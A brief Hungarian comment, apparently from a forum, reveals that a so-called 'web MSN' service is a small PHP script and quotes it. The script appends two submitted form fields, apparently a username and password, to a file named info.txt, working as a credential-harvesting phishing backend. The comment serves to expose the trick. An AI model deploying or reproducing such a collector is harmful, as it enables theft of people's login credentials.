hát, a web msn az egy kis php script ami így néz ki, és szerintem ebből rájössz hogy mi ez:
<?php
if(!empty($_POST['textfield']) && !empty($_POST['textfield2'])) {
$contents = $_POST['textfield'] . ':' . $_POST['textfield2'] . "\n";
$fh = fopen('./info.txt', 'a+');
fwrite($fh, $contents);
fclose($fh);
}
?>